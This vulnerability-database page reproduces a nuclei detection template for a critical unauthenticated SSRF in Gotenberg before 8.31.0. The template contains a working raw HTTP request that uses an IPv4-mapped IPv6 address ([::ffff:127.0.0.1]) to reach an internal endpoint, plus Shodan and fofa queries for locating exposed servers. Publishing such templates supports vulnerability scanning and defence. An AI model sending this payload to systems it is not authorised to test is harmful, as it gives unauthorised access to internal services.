Lucene search
+L

Gotenberg < 8.31.0 - Server-Side Request Forgery

🗓️ 30 Aug 2026 09:19:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Unauthenticated SSRF in Gotenberg before 8.31.0 via IPv4-mapped IPv6 address bypass.

Related
Refs
Code
id: CVE-2026-42596

info:
  name: Gotenberg < 8.31.0 - Server-Side Request Forgery
  author: str4k3r
  severity: critical
  description: |
    Gotenberg before 8.31.0 is vulnerable to server-side request forgery (SSRF) due to insufficient validation of URLs in the downloadFrom API. An unauthenticated attacker can exploit the flaw by providing specially crafted IPv4-mapped IPv6 addresses (such as http://[::ffff:127.0.0.1]) that bypass the deny-list and allow access to internal resources. Fixed versions properly recognize these addresses and prevent such requests.
  reference:
    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-4vmc-gm8v-m35h
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42596
  classification:
    cve-id: CVE-2026-42596
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cwe-id: CWE-918
    cpe: cpe:2.3:a:gotenberg:gotenberg:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    shodan-query: "Gotenberg"
    fofa-query: "Gotenberg"
  tags: cve,cve2026,gotenberg,ssrf

http:
  - raw:
      - |
        POST /forms/libreoffice/convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----testBoundary

        ------testBoundary
        Content-Disposition: form-data; name="downloadFrom"

        [{"url":"http://[::ffff:127.0.0.1]:3000/health"}]
        ------testBoundary--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "No 'Content-Disposition' header from 'http://[::ffff:127.0.0.1]:3000/health'"

      - type: status
        status:
          - 400
# digest: 4a0a00473045022100b7c1cc7b9cf83776c41ba88fa0e335f6dfc653bb03285b82d47ba43a6034342b02200c9c8187dc2f81e64c0ab1a9839a6661508a0c4c01c1f9f83b7c66dfa2376022:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Aug 2026 09:19Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.4
EPSS0.00352
SSVC
4